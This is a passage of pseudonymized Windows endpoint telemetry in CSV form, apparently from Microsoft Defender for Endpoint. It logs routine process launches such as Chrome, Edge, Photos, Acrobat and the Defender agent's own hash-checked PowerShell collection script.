Files\Google\Chrome\Application\chrome.exe,2438312,8ac870b7e4a550c902e83db69184650f,9417611ee6fc2e697104026ceb4ba64a8af6d7ce4ba7b5c95af96e6c3300fbc6,dadb254e42330d6ee4166af6e234c1247b3cd3f4,8ac870b7e4a550c902e83db69184650f,9417611ee6fc2e697104026ceb4ba64a8af6d7ce4ba7b5c95af96e6c3300fbc6,dadb254e42330d6ee4166af6e234c1247b3cd3f4,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-23 00:51:42.915074600+00:00,11880,chrome.exe,"""chrome.exe"" ",False,2021-06-23 00:51:19.951048300+00:00,11452,\Device\HarddiskVolume3\Windows\explorer.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 02:21:40.097191500+00:00,2021-06-23 02:22:55.832119200+00:00,7d3e7c33-c2bd-437b-a474-ca30e7a48053,computerpii_0a470890c60768167990033d701e7bd881398861,159703,False,10.7740.19041.1052,False,11540474045171838,,11540474045172710,2021-06-23 00:51:42.915074600+00:00,11880,2021-06-23 00:51:42.915074600+00:00,\Device\HarddiskVolume3\Program Files\Google\Chrome\Application\chrome.exe,11880,128,ActiveProcessStartkey,C:\Program Files\Google\Chrome\Application,2438312,2021-06-11 00:10:25+00:00,2021-06-11 01:45:55.958347+00:00,2021-06-23 00:51:43.090625600+00:00,2020-11-11 01:44:09.128437300+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,388102317,388102317,False,1.0,3073.0,,384.0,,,,,,,Invalid,Unknown,Invalid,Unknown,Google LLC,Google Chrome,91.0.4472.106,chrome_exe,chrome.exe,Google Chrome,Google LLC,Google Chrome,91.0.4472.106,chrome_exe,chrome.exe,Google Chrome
+191,False,Low,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 02:21:47.044051700+00:00,10012,chrome.exe,"""chrome.exe"" --type=renderer --field-trial-handle=1732,11555426520389665454,4002175263595542303,131072 --lang=en-US --origin-trial-disabled-features=SecurePaymentConfirmation --device-scale-factor=1.25 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=54 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7232 /prefetch:1",PortableExecutable,2020-11-11 01:44:09.128437300+00:00,C:\Program Files\Google\Chrome\Application\chrome.exe,2438312,8ac870b7e4a550c902e83db69184650f,9417611ee6fc2e697104026ceb4ba64a8af6d7ce4ba7b5c95af96e6c3300fbc6,dadb254e42330d6ee4166af6e234c1247b3cd3f4,8ac870b7e4a550c902e83db69184650f,9417611ee6fc2e697104026ceb4ba64a8af6d7ce4ba7b5c95af96e6c3300fbc6,dadb254e42330d6ee4166af6e234c1247b3cd3f4,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-23 00:51:42.915074600+00:00,11880,chrome.exe,"""chrome.exe"" ",False,2021-06-23 00:51:19.951048300+00:00,11452,\Device\HarddiskVolume3\Windows\explorer.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 02:21:48.018853600+00:00,2021-06-23 02:22:55.832415400+00:00,1e886d10-423e-493b-8e4e-b86728065d7d,computerpii_0a470890c60768167990033d701e7bd881398861,159707,False,10.7740.19041.1052,False,11540474045171838,,11540474045172711,2021-06-23 00:51:42.915074600+00:00,11880,2021-06-23 00:51:42.915074600+00:00,chrome.exe,11880,256,ActiveProcessStartkey,C:\Program Files\Google\Chrome\Application,2438312,2021-06-11 00:10:25+00:00,2021-06-11 01:45:55.958347+00:00,2021-06-23 00:51:43.090625600+00:00,2020-11-11 01:44:09.128437300+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,388102317,388102317,False,1.0,3073.0,,,,,,,,,Invalid,Unknown,Invalid,Unknown,Google LLC,Google Chrome,91.0.4472.106,chrome_exe,chrome.exe,Google Chrome,Google LLC,Google Chrome,91.0.4472.106,chrome_exe,chrome.exe,Google Chrome
+192,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 02:21:48.787812700+00:00,6116,identity_helper.exe,"""identity_helper.exe"" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1988,3446608907217918886,11874100668059788691,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2880 /prefetch:8",PortableExecutable,2021-06-18 23:49:38.664048500+00:00,C:\Program Files (x86)\Microsoft\Edge\Application\91.0.864.54\identity_helper.exe,1080720,33098278b86f6e967f5e0f66da8192fa,dbe0ea072c1e26f07ae34f6b721074635048644ef14fce622e4097f05b6684c2,c345ea4721c3bafc8f7592f97f0407541b464904,e28229223228fde1f3bb465926566414,a1cb5c84d7387fa4da415c9af0db5f5534575f045f71b7afee0922fc0352d73f,c0c6f4240a04db99aae6f7c5312b7308c44945b1,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-23 00:51:42.015515900+00:00,20024,msedge.exe,"""msedge.exe"" --profile-directory=Default",False,2021-06-23 00:51:19.951048300+00:00,11452,\Device\HarddiskVolume3\Windows\explorer.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 02:21:49.033489+00:00,2021-06-23 02:22:55.832508300+00:00,21d1b33d-4f83-4b2f-99c8-d7d7bd081a68,computerpii_0a470890c60768167990033d701e7bd881398861,159708,False,10.7740.19041.1052,False,11540474045171833,,11540474045172712,2021-06-23 00:51:42.015515900+00:00,20024,2021-06-23 00:51:42.015515900+00:00,\Device\HarddiskVolume3\Program Files (x86)\Microsoft\Edge\Application\msedge.exe,20024,18560,ActiveProcessStartkey,C:\Program Files (x86)\Microsoft\Edge\Application,3278224,2021-06-17 16:58:31+00:00,2021-06-18 05:12:00.071479900+00:00,2021-06-23 00:51:42.099396700+00:00,2021-05-21 00:32:35.112476600+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,388102317,388102317,False,1.0,3073.0,,,,,,,,,Valid,OsVendorApplication,Valid,OsVendorApplication,Microsoft Corporation,Microsoft Edge,91.0.864.54,msedge_exe,msedge.exe,Microsoft Edge,,Microsoft Edge,91.0.864.54,PWA Identity Proxy Host,identity_helper.exe,PWA Identity Proxy Host
+193,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-23 07:02:41.468228500+00:00,10464,SenseIR.exe,"""SenseIR.exe"" ""OfflineSenseIR"" ""4252"" ""eyJ**********""",PortableExecutable,2021-06-09 01:20:34.273470300+00:00,C:\Program Files\Windows Defender Advanced Threat Protection\SenseIR.exe,3851040,a11f7b4a8b2803d3570d1016486d3ba8,dfe1329db9957ed24a8704049f159b285a027b049cf5412b30a9b3416981cdf1,e7f872448beb7fd702dac51c4e83b4f90be44155,7683949c195624008c868b6a7ab6a45c,8a31fd68d0629b6e486209353210c6e4f815ffb1b38e7ab58438ca0c9637f018,3eb02a132c439e2adf17ee32ddf6208727092c5a,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:11.888696800+00:00,4916,MsSense.exe,"""MsSense.exe""",True,2021-06-10 00:46:10.554990700+00:00,988,services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 07:02:41.500496400+00:00,2021-06-23 07:05:19.928729800+00:00,1338f57e-32d6-4e70-b319-cb606b69c488,computerpii_0a470890c60768167990033d701e7bd881398861,164737,False,10.7740.19041.1052,False,11540474045137006,,11540474045174025,2021-06-10 00:46:11.888696800+00:00,4916,2021-06-10 00:46:11.888696800+00:00,\Device\HarddiskVolume3\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe,4916,128,ActiveProcessStartkey,C:\Program Files\Windows Defender Advanced Threat Protection,5393304,2014-12-21 17:17:53+00:00,2021-06-09 01:20:34.243399200+00:00,2021-06-10 00:46:12.793828700+00:00,2021-06-09 01:20:34.069525500+00:00,256,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,,,256.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.7740.19041.1052,MsSense.exe,MsSense.exe,Windows Defender Advanced Threat Protection Service Executable,Microsoft Corporation,Microsoft® Windows® Operating System,10.7740.19041.1023,SenseIR.exe,SenseIR.exe,Windows Defender Advanced Threat Protection Sense IR module
+194,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-23 07:02:51.606280600+00:00,13520,powershell.exe,"powershell.exe -ExecutionPolicy AllSigned -NoProfile -NonInteractive -Command ""& {$OutputEncoding = [Console]::OutputEncoding =[System.Text.Encoding]::UTF8;$scriptFileStream = [System.IO.File]::Open('C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-075b1b75665454b124533865bb823596d0f0d475\FilePII_b0e4a6fa7a08a13dc38c85a6be2c0794960d2d83.ps1', [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read, [System.IO.FileAccess]::Read);$calculatedHash = Get-FileHash 'C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-075b1b75665454b124533865bb823596d0f0d475\FilePII_b0e4a6fa7a08a13dc38c85a6be2c0794960d2d83.ps1' -Algorithm SHA256;if (!($calculatedHash.Hash -eq '55ac3e59e2c2dd5964cb1760cab52db52c7ff7bbb2cb5e65ddf2ab4ad48043d3')) { exit 323;}; . 'C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-075b1b75665454b124533865bb823596d0f0d475\FilePII_b0e4a6fa7a08a13dc38c85a6be2c0794960d2d83.ps1' }""",PortableExecutable,2020-10-09 20:48:24.470101200+00:00,C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,452608,04029e121a0cfa5991749937dd22a1d9,9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f,f43d9bb316e30ae1a3494ac5b0624f6bea1bf054,a11f7b4a8b2803d3570d1016486d3ba8,dfe1329db9957ed24a8704049f159b285a027b049cf5412b30a9b3416981cdf1,e7f872448beb7fd702dac51c4e83b4f90be44155,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-23 07:02:41.468228500+00:00,10464,SenseIR.exe,"""SenseIR.exe"" ""OfflineSenseIR"" ""4252"" ""eyJ**********""",True,2021-06-10 00:46:11.888696800+00:00,4916,\Device\HarddiskVolume3\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 07:02:52.144961800+00:00,2021-06-23 07:05:19.929229500+00:00,5bfc3e70-f239-4848-b109-e9182d7edc33,computerpii_0a470890c60768167990033d701e7bd881398861,164743,False,10.7740.19041.1052,False,11540474045174025,,11540474045174030,2021-06-23 07:02:41.468228500+00:00,10464,2021-06-23 07:02:41.468228500+00:00,\Device\HarddiskVolume3\Program Files\Windows Defender Advanced Threat Protection\SenseIR.exe,10464,128,ActiveProcessStartkey,C:\Program Files\Windows Defender Advanced Threat Protection,3851040,2016-08-29 02:24:16+00:00,2021-06-09 01:20:34.374102900+00:00,2021-06-23 02:55:16.213537200+00:00,2021-06-09 01:20:34.273470300+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,256.0,,256.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.7740.19041.1023,SenseIR.exe,SenseIR.exe,Windows Defender Advanced Threat Protection Sense IR module,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,POWERSHELL,PowerShell.EXE,Windows PowerShell
+195,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-23 07:02:51.694884500+00:00,10068,conhost.exe,conhost.exe 0xffffffff -ForceV1,PortableExecutable,2021-05-12 01:12:35.470188200+00:00,C:\Windows\System32\conhost.exe,875008,81ca40085fc75babd2c91d18aa9ffa68,6651ab6c5c6d85c86b0c6c532115662e09f338fa8cc1233e1434139346f25ef6,c313e591b29d8be1cbe3809826a6a8647314698e,04029e121a0cfa5991749937dd22a1d9,9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f,f43d9bb316e30ae1a3494ac5b0624f6bea1bf054,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-23 07:02:51.606280600+00:00,13520,powershell.exe,"powershell.exe -ExecutionPolicy AllSigned -NoProfile -NonInteractive -Command ""& {$OutputEncoding = [Console]::OutputEncoding =[System.Text.Encoding]::UTF8;$scriptFileStream = [System.IO.File]::Open('C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-075b1b75665454b124533865bb823596d0f0d475\FilePII_b0e4a6fa7a08a13dc38c85a6be2c0794960d2d83.ps1', [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read, [System.IO.FileAccess]::Read);$calculatedHash = Get-FileHash 'C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-075b1b75665454b124533865bb823596d0f0d475\FilePII_b0e4a6fa7a08a13dc38c85a6be2c0794960d2d83.ps1' -Algorithm SHA256;if (!($calculatedHash.Hash -eq '55ac3e59e2c2dd5964cb1760cab52db52c7ff7bbb2cb5e65ddf2ab4ad48043d3')) { exit 323;}; . 'C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-075b1b75665454b124533865bb823596d0f0d475\FilePII_b0e4a6fa7a08a13dc38c85a6be2c0794960d2d83.ps1' }""",True,2021-06-23 07:02:41.468228500+00:00,10464,\Device\HarddiskVolume3\Program Files\Windows Defender Advanced Threat Protection\SenseIR.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 07:02:52.145292300+00:00,2021-06-23 07:05:19.929311800+00:00,ceda5cfc-e133-43a9-8c93-7f1c66d82408,computerpii_0a470890c60768167990033d701e7bd881398861,164744,False,10.7740.19041.1052,False,11540474045174030,,11540474045174031,2021-06-23 07:02:51.606280600+00:00,13520,2021-06-23 07:02:51.606280600+00:00,\Device\HarddiskVolume3\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,13520,128,ActiveProcessStartkey,C:\Windows\System32\WindowsPowerShell\v1.0,452608,2037-06-10 07:45:25+00:00,2020-10-09 20:48:24.470101200+00:00,2021-06-23 02:55:26.342673700+00:00,2020-10-09 20:48:24.470101200+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,256.0,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,POWERSHELL,PowerShell.EXE,Windows PowerShell,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.964,ConHost,CONHOST.EXE,Console Window Host
+196,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-23 07:02:56.320566100+00:00,13056,csc.exe,"""csc.exe"" /noconfig /fullpaths @""C:\Windows\TEMP\fr0evnyq\fr0evnyq.cmdline""",PortableExecutable,2019-12-07 09:10:35.992536100+00:00,C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe,2759232,f65b029562077b648a6a5f6a1aa76a66,4a6d0864e19c0368a47217c129b075dddf61a6a262388f9d21045d82f3423ed7,528973416456c780051889ca1709510b6bf73370,04029e121a0cfa5991749937dd22a1d9,9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f,f43d9bb316e30ae1a3494ac5b0624f6bea1bf054,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-23 07:02:51.606280600+00:00,13520,powershell.exe,"powershell.exe -ExecutionPolicy AllSigned -NoProfile -NonInteractive -Command ""& {$OutputEncoding = [Console]::OutputEncoding =[System.Text.Encoding]::UTF8;$scriptFileStream = [System.IO.File]::Open('C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-075b1b75665454b124533865bb823596d0f0d475\FilePII_b0e4a6fa7a08a13dc38c85a6be2c0794960d2d83.ps1', [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read, [System.IO.FileAccess]::Read);$calculatedHash = Get-FileHash 'C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-075b1b75665454b124533865bb823596d0f0d475\FilePII_b0e4a6fa7a08a13dc38c85a6be2c0794960d2d83.ps1' -Algorithm SHA256;if (!($calculatedHash.Hash -eq '55ac3e59e2c2dd5964cb1760cab52db52c7ff7bbb2cb5e65ddf2ab4ad48043d3')) { exit 323;}; . 'C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-075b1b75665454b124533865bb823596d0f0d475\FilePII_b0e4a6fa7a08a13dc38c85a6be2c0794960d2d83.ps1' }""",True,2021-06-23 07:02:41.468228500+00:00,10464,\Device\HarddiskVolume3\Program Files\Windows Defender Advanced Threat Protection\SenseIR.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 07:02:56.378598+00:00,2021-06-23 07:05:19.931862700+00:00,4165f458-0bcf-421e-9bd7-56799d0aec3a,computerpii_0a470890c60768167990033d701e7bd881398861,164770,False,10.7740.19041.1052,False,11540474045174030,,11540474045174033,2021-06-23 07:02:51.606280600+00:00,13520,2021-06-23 07:02:51.606280600+00:00,\Device\HarddiskVolume3\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,13520,16512,ActiveProcessStartkey,C:\Windows\System32\WindowsPowerShell\v1.0,452608,2037-06-10 07:45:25+00:00,2020-10-09 20:48:24.470101200+00:00,2021-06-23 02:55:26.342673700+00:00,2020-10-09 20:48:24.470101200+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,256.0,0.0,257.0,,,,,,,Valid,OsVendor,Valid,OsVendorApplication,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,POWERSHELL,PowerShell.EXE,Windows PowerShell,Microsoft Corporation,Microsoft® .NET Framework,4.8.4084.0,csc.exe,csc.exe,Visual C# Command Line Compiler
+197,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-23 07:02:56.413163600+00:00,13496,cvtres.exe,"cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 ""/OUT:C:\Windows\TEMP\FilePII_e62aefa6319f4464bbee4a6001dfe4796457f929.tmp"" ""c:\Windows\Temp\fr0evnyq\FilePII_f752c16403c09c3db1be3e9c0fc130c6462a882c.TMP""",PortableExecutable,2019-12-07 09:10:36.196453400+00:00,C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe,52744,c877cbb966ea5939aa2a17b6a5160950,1fe531eac592b480aa4bd16052b909c3431434f17e7ae163d248355558ce43a6,2a3249732f5aa4588a4a9895ffe217355041d663,f65b029562077b648a6a5f6a1aa76a66,4a6d0864e19c0368a47217c129b075dddf61a6a262388f9d21045d82f3423ed7,528973416456c780051889ca1709510b6bf73370,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-23 07:02:56.320566100+00:00,13056,csc.exe,"""csc.exe"" /noconfig /fullpaths @""C:\Windows\TEMP\fr0evnyq\fr0evnyq.cmdline""",True,2021-06-23 07:02:51.606280600+00:00,13520,\Device\HarddiskVolume3\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 07:02:56.497976700+00:00,2021-06-23 07:05:19.932342700+00:00,56ff38e4-9892-4697-b56a-9f0176b3ca1a,computerpii_0a470890c60768167990033d701e7bd881398861,164776,False,10.7740.19041.1052,False,11540474045174033,,11540474045174035,2021-06-23 07:02:56.320566100+00:00,13056,2021-06-23 07:02:56.320566100+00:00,\Device\HarddiskVolume3\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe,13056,18560,TerminateProcessStartkey,C:\Windows\Microsoft.NET\Framework64\v4.0.30319,2759232,2019-11-24 09:26:27+00:00,2019-12-07 09:10:35.992536100+00:00,2021-06-23 03:01:19.425920800+00:00,2019-12-07 09:10:35.992536100+00:00,18560,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,0.0,257.0,,,,,,,,,Valid,OsVendorApplication,Valid,OsVendor,Microsoft Corporation,Microsoft® .NET Framework,4.8.4084.0,csc.exe,csc.exe,Visual C# Command Line Compiler,Microsoft Corporation,Microsoft® .NET Framework,14.10.25028.0,CVTRES.EXE,CVTRES.EXE,Microsoft® Resource File To COFF Object Conversion Utility
+198,False,Low,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 02:22:38.905254300+00:00,14168,Microsoft.Photos.exe,"""Microsoft.Photos.exe"" -ServerName:App.AppXzst44mncqdg84v7sv6p7yznqwssy6f7f.mca",PortableExecutable,2021-03-15 03:20:29.387021800+00:00,C:\Program Files\WindowsApps\Microsoft.Windows.Photos_2020.20120.4004.0_x64__8wekyb3d8bbwe\Microsoft.Photos.exe,481280,b2bf675d6f8ba980a55a315b81c371e4,98a68ea19db376520850c7bb5f2e2a4526e5e21628939b489d0698cdaaca3f92,813c1428fce18416d4e62e836b5efede1301379f,f586835082f632dc8d9404d83bc16316,643ec58e82e0272c97c2a59f6020970d881af19c0ad5029db9c958c13b6558c7,010db07461e45b41c886192df6fd425ba8d42d82,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:10.653932100+00:00,504,svchost.exe,svchost.exe -k DcomLaunch -p,True,2021-06-10 00:46:10.554990700+00:00,988,\Device\HarddiskVolume3\Windows\System32\services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 02:22:39.012118200+00:00,2021-06-23 02:24:58.398818400+00:00,369e13cf-95bf-4da5-84bf-534dbfc19cb8,computerpii_0a470890c60768167990033d701e7bd881398861,159717,False,10.7740.19041.1052,False,11540474045136908,,11540474045172725,2021-06-10 00:46:10.653932100+00:00,504,2021-06-10 00:46:10.653932100+00:00,\Device\HarddiskVolume3\Windows\System32\svchost.exe,504,128,ActiveProcessStartkey,C:\Windows\System32,57360,1972-12-14 16:22:50+00:00,2020-10-09 20:47:23.714846100+00:00,2021-06-10 00:46:17.892199900+00:00,2020-10-09 20:47:23.714846100+00:00,128,NoTruncation,0,,10.0,False,,,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,388102317,False,,128.0,,128.0,,,,,,,Valid,OsVendor,Valid,OsVendorApplication,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,svchost.exe,svchost.exe,Host Process for Windows Services,,,,,,
+199,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-25 01:38:06.033849+00:00,16540,Acrobat.exe,"""Acrobat.exe"" ""C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\Desktop\Aplha Node Limited\KYB\FilePII_e1fb3a8cae83fea2df8a78219eeab4c38ecb8588.pdf""",PortableExecutable,2021-05-28 05:58:58+00:00,C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat\Acrobat.exe,3796704,ac7d72262c5389c8cbe58cdddd2083a3,9d84b01f481959d4c8c335af7c1473ba831b698387441a05713527f1dbb517d2,6daf3b0133be331cf2e41a8f4180f01653b91845,4bf8cf1a2379b0054860ec220ca329b9,63f8608b5eb6ba2d37fffaf46f86363faf15684a367c1603ceb06f0693c877ba,e94fc38810c097a64f7419960f2d21052d1cb2e7,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-25 00:39:00.068282600+00:00,15164,explorer.exe,Explorer.EXE,False,2021-06-25 00:38:59.791718800+00:00,20356,\Device\HarddiskVolume3\Windows\System32\userinit.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-25 01:38:06.105996200+00:00,2021-06-25 01:39:54.750530100+00:00,cd571028-6a9e-4f87-9161-91634cb2d224,computerpii_0a470890c60768167990033d701e7bd881398861,183614,False,10.7740.19041.1052,False,11540474045178163,,11540474045178799,2021-06-25 00:39:00.068282600+00:00,15164,2021-06-25 00:39:00.068282600+00:00,\Device\HarddiskVolume3\Windows\explorer.exe,15164,18560,ActiveProcessStartkey,C:\Windows,4891752,2074-04-27 14:38:40+00:00,2021-06-09 01:20:37.481306100+00:00,2021-06-25 00:39:00.076466400+00:00,2021-06-09 01:20:37.358875500+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,469412852,469412852,False,1.0,20481.0,,,,,,,,,Valid,OsVendor,Invalid,Unknown,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.1023,explorer,EXPLORER.EXE,Windows Explorer,Adobe Systems Incorporated,Adobe Acrobat DC,21.5.20048.436468,,Acrobat.exe,Adobe Acrobat DC
